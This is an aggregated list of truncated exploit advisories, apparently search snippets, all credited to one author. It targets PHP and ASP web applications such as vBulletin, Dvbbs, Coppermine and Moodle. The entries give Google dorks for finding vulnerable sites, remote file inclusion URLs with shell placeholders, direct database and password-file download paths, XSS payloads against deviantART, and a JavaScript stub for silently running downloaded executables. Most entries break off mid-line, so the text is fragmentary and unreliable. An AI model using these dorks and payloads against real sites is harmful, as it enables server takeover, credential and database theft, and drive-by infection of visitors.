#Discovred By : Hasadya Raed
#Contact : [EMAIL PROTECTED]
#Script: vBulletin V3.6.8ulletin V3.6.8
#Dork: vBulletin V3.6.8ulletin V3.6.8
#Exploit :
http://www.Victim.com/vBulletin V3.6.8ulletin
V3.6.8/faq.php?s=&do=search&a
Discovred By : Hasadya Raed
Contact : [EMAIL PROTECTED] , [EMAIL PROTECTED] , [EMAIL PROTECTED]
Greetz : Fairoz
Script: AL-Athkar.v2.0
Download: http://delmaa.com/upfile/users/AL
Discovred By : Hasadya Raed
Contact : [EMAIL PROTECTED] , [EMAIL PROTECTED] , [EMAIL PROTECTED]
Greetz : Jonathan , Muts
Script: ALL vgallite
Dork: "vga
Discovred By : Hasadya Raed
Contact : [EMAIL PROTECTED] , [EMAIL PROTECTED] , [EMAIL PROTECTED]
Greetz : Muhammed Zeed , Alaadin Gamos
Script: AL-Caricatier,V.2.5
Dork: &qu
By Hasadya Raed
Contact : [EMAIL PROTECTED] - Israel
Greetz : -Fairoz-
---
vBulletin v3.6.5
Dork : "Powered by vBulletin v3.6.5. Copyright ©2000 - 2007 "
---
Exploits :
Http://WWW.Victim.Com/vb/includes/functions.php
Discovred By : Hasadya Raed
Contact : [EMAIL PROTECTED] - Israel
---
Now You Can To Download Exe Files And To Run Without Msgs :
Exploit :
var dc=document.write;
var sc=String.fromCharCode;
var exe="<a rel="nofollow" href="http://www
By : Hasadya Raed
Contact : [EMAIL PROTECTED]
Israel
--
Script : Dvbbs Version 7.1.0 Sp1
Dork : "Powered By Dvbbs Version 7.1.0 Sp1"
--
Exploit :
http://www.victim.com/Data/Dvbbs7.mdb
Discovered By: Hasadya Raed
Contact : [EMAIL PROTECTED]
Israel
---
Script : VBZooM V1.12
VBZooM V1.12 "reply.php" SQL Injection
Dork : POWERED BY VBZooM V1.12
---
B.File : reply.php
---
Exploit :
http://www.
Found By : Hasadya Raed
Contact : [EMAIL PROTECTED]
---
Script : SH-News 3.1
Dork : "Powered by SH-News 3.1"
Greetz : Guardian Information Systems
---
B.Files :
report.php
archive.php
comments.php
init.php
news.php
Exploits :
http://www.
Found By: Hasadya Raed
Contact : [EMAIL PROTECTED]
Greetz : Guardian Information Systems
---
Script :PortalApp ==>bypass
Download :www.portalapp.net
Dork:"Copyright @2007 Iatek LLC"
or "powered by PortalApp"
or"Copyright @2007 Ia
* Author : Hasadya Raed
* Contact : [EMAIL PROTECTED] ~>Israel Hacker
* Greetz : Fairoz :)
* Advisory : Z-Blog 1.7 Authentication Bypass/Database Download Vulnerability
* Script : Z-Blog 1.7
* Impact : Remote
* Googledork : "Powered by Z-Blog 1.7" , "
Discovered By Hasadya Raed
Contact : [EMAIL PROTECTED]
--
Script : FlashChat_v479
Download : files.filefront.com/FlashChat+v479rar/;7192354;/fileinfo.html
--
B.Files :
connection.php >Require_once($f_cms);
common.php > Require_once(
By Hasadya Raed
Contact : [EMAIL PROTECTED]
Israel
--
Script : impex
Dork : "ipmex"
--
B.Files :
ImpExData.php
impexdisplay.php
--
Exploits :
http://www.Victim.com/impex/ImpExData.php?systempath=[Shell-Att
By Hasadya Raed
Contact : [EMAIL PROTECTED]
Israel
---
Script : phphd_downloads
Download Script : http://www.hintondesign.org
Dork : "Copyright 2006 (c) Hinton Design All Rights Reserved"
---
B.File :
common.php
-
By Hasadya Raed
Contact : [EMAIL PROTECTED]
Israel
--
Script : download_engine_V1.4.3
Dork : (c) 2002 AlexScriptEngine
--
B.Files :
addmember.php
class.phpmailer.php
colorpicker.php
--
Exploits :
http://www.Victim.com
By Hasadya Raed
Contact : [EMAIL PROTECTED]
Greetz : Brotha Mohammed Zeed
---
Script : Lore v1
Download : http://www.pineappletechnologies.com
Dork : Pineapple Technologies 2003-2005 (c)
---
B.Files :
class.phpmailer.php
By Hasadya Raed
Contact : [EMAIL PROTECTED]
Greetz : Yonatan | Israel
---
Script : Jeebles Directory
Dork : "Jeebles Directory"
Site : Not Web
---
Expl :
http://www.Victim.com/Jeebles Directory/index.php?externalconfig
By Hasadya Raed
Contact : [EMAIL PROTECTED]
Israel
--
Script : phpexplorator_2_0
Download : http://phpexplorator.sourceforge.com
Dork : Copyright (c) 2006, Tchouamou Eric Herve
--
B.File :
phpexplorator.php
--
Expl :
http
By Hasadya Raed
Contact : [EMAIL PROTECTED]
Israel
---
Script : stat12
Download Script : http://www.samphp.com
Dork : Copyright (c) 2004 by Sam Tang
Greetz : Yonatan
---
B.File :
index.php
---
Expl :
http://www.Victim.com
By Hasadya Raed
Contact : [EMAIL PROTECTED]
Israel
Script : Aardvark Topsites PHP 5
Dork : "Copyright (c) 2003-2005 Jeremy Scheff. All rights reserved"
---
B.Files :
settings_sql.php
n
By Hasadya Raed
Contact : [EMAIL PROTECTED]
Israel
-
Script : Shop-SCRIPT FREE
Dork : "Copyright (c) 2004 Articus consulting group. All rights reserved"
-
B.Files :
smarty
By Hasadya Raed
Contact : [EMAIL PROTECTED]
Israel
---
Script : SLAED_CMS_2
Dork : "Web site engine code is Copyright © 2006 by SLAED CMS. All rights
reserved"
---
B.Files :
admin.php
By Hasadya Raed
Contact : [EMAIL PROTECTED] | Israel
--
Script : phpBB-2.0.19
Dork : phpBB-2.0.19
--
B.File :
usercp_register.php
--
V.Code :
include
By Hasadya Raed
Contact : [EMAIL PROTECTED]
Script : Coppermine Photo Gallery
Dork : Copyright (c) 2003-2006 Coppermine Dev Team
B.Files :
processor.php
include/functions.php
include/picmgmt.inc.php
include
By Hasadya Raed
Contact : [EMAIL PROTECTED]
-
Script : copyright © James Coyle; JCcorp
Dork : copyright © James Coyle; JCcorp
-
B.File :
createurl.php
-
Expl:
createurl.php?formurl=http://127.0.0.1
By Hasadya Raed
Contact : RaeD [At] BsdMail [Dot] Com
--
Script : moodle-1.7.1
Dork : "Copyright (c) moodle"
--
B.Files :
utfdbmigrate.php
By Hasadya Raed
Contact : RaeD [At] BsdMail [Dot] Com / GunMan_Pump [At] Hotmail [Dot] Com
Script : ClipShare.v1.5.3
Dork : "Copyright © 2006 Powered By Clip-Share.Com. All rights res
By Hasadya Raed
Contact : [EMAIL PROTECTED]
-
Script : PHP Photo Album
Dork : "Powered by PHP Photo Album"
-
B.File :
By Hasadya Raed
Contact : [EMAIL PROTECTED]
Script : SoftNews Media Group
Dork : "Copyright © 2004,2006 SoftNews Media Group"
Greetz : Only To Security Focus
B.Files :
init.php
ed
By Hasadya Raed
Contact : [EMAIL PROTECTED]
Script : Premod SubDog 2
Dork : "Premod SubDog 2"
B.Files :
functions_kb.php
themen_portal_mitte.php
logger_engine.php
Exploi
By Hasadya Raed
Contact : [EMAIL PROTECTED]
Script : copyright (c) James Coyle; JCcorp
Expl : Remote Include File
Dork : "copyright © James Coyle; JCcorp"
B.File : createurl.php
--
By Hasadya Raed
Contact : [EMAIL PROTECTED]
Script : Coppermine Photo Gallery
Expl : Remote Include File
Dork : "Copyright (c) 2003-2006 Coppermine Dev Team"
B.Files :
image_processor.php
functions.php
picmg
By Hasadya Raed
Contact : [EMAIL PROTECTED]
XSS BUGS
Script : deviantART
http://www.deviantart.com/deviation/48117218/?qo=";>a l e r
t('RaeD');
http://prints.deviantart.com/?catpath=manga,cartoons&a
Discovered By : Hasadya Raed
Contact : [EMAIL PROTECTED]
Script: vCard 2.6 (c)2002
**
Bug in : create.php
Exploit :
http
===
Script : Script Phorum
Found By : Hasadya Raed
Contact : [EMAIL PROTECTED]
=
exemple:
http://www.site.com/[path]/admin.php?upgradefile=";>***
Theif Password Script UploadScript All Versions To 1.02
Discovered By : Hasadya Raed
Contact : [EMAIL PROTECTED]
Script : UploadScript V1.0/ 1.02
Dark : Powered by Uploadscript v1.0/v1.02
Only Add This File After The Link :
password.txt
Expl :
Http://www.Victim.Com/Script_Path
Remote File Include In DBImageGallery 1.2.2
Discovered By : Hasadya Raed
Contact Me : [EMAIL PROTECTED]
Download Script :
http://www.dbscripts.net/download/?file=1
B.Files:
admin/attributes.php -> require_once $donsimg_base_path
admin/images.php -> require_once $donsimg_bas
Remote IInclude File : SPAW Editor PHP Edition upgrade version 1.2.3 to 1.2.4
Discovered By : Hasadya Raed
Contact Me : RaeD[at]BsdMail[dot]Com
Download Script:
http://heanet.dl.sourceforge.net/sourceforge/spaw/spaw-php-123-to-124.zip
B.File :img_library.php :
include $spaw_root.'
Remote Incluude File :
By Hasadya Raed
Contact : [EMAIL PROTECTED]
Author : Hasadya Raed
Script : arabhost
Download : http://delmaa.com/upfile/users/arabHost.zip
B.File :
function.php
V.Code :
include($adminfloder");
Expl : http://www.victim.com/path/function.php?adminfolder=[Shell-A
39 matches
Mail list logo
